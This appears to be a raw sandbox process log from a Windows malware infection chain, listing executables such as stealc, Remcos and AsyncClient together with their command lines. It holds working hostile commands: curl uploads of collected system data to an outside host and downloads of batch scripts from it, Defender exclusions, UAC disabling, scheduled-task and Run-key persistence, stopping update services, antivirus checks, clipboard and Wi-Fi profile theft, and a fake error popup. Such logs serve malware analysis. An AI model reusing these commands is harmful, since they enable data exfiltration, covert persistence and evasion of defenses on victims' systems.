C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe

"C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe"

C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe

"C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"

C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"

C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"

C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe

C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'

C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"

C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe

"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F3FD84A91624CE65960EB9CC6DEDC722 C

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp979A.tmp.bat""

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI91CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241080453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe

"C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Users\Admin\AppData\Local\Temp\svchost015.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Users\Admin\AppData\Local\Temp\update.exe

"C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Users\Admin\AppData\Local\Temp\Files\7z.exe

"C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe"

C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe

"C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"

C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\Files\out.exe

"C:\Users\Admin\AppData\Local\Temp\Files\out.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding CF5831D0E8518FC77F67C9B3859A1125

C:\Users\Admin\AppData\Local\Temp\Files\c3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 82EBABD0359BB19B907B788469303A45 E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh"

C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe" "RunRole" "cce1306d-e7ab-4219-bf52-82c99d2b1aa6" "User"

C:\Users\Admin\AppData\Local\Temp\Files\key.exe

"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1468 -ip 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 360

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe" & rd /s /q "C:\ProgramData\U3E3EC2VAAAI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe

"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"

C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe

"C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PPTBMYWF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PPTBMYWF" binpath= "C:\ProgramData\wxiftyzsteng\qpgcxlhnvaqc.exe" start= "auto"

C:\Windows\System32\Wbem\wmic.exe

wmic nic where NetEnabled='true' get MACAddress,Name

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe

C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe

C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe

"C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe"

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"

C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe

"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"

C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe

"C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5644 -ip 5644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 440

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5976 -ip 5976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 224

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe

"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"

C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe

"C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 217412

C:\Windows\SysWOW64\findstr.exe

findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

Possibly.pif N

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\build11.exe

"C:\Users\Admin\AppData\Local\Temp\Files\build11.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_4828_133785306684546397\stub.exe

C:\Users\Admin\AppData\Local\Temp\Files\build11.exe

C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe

"C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""

C:\Windows\system32\taskkill.exe

taskkill /F /IM "taskmgr.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""

C:\Windows\system32\schtasks.exe

schtasks /query /TN "MonsterUpdateService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe

"C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

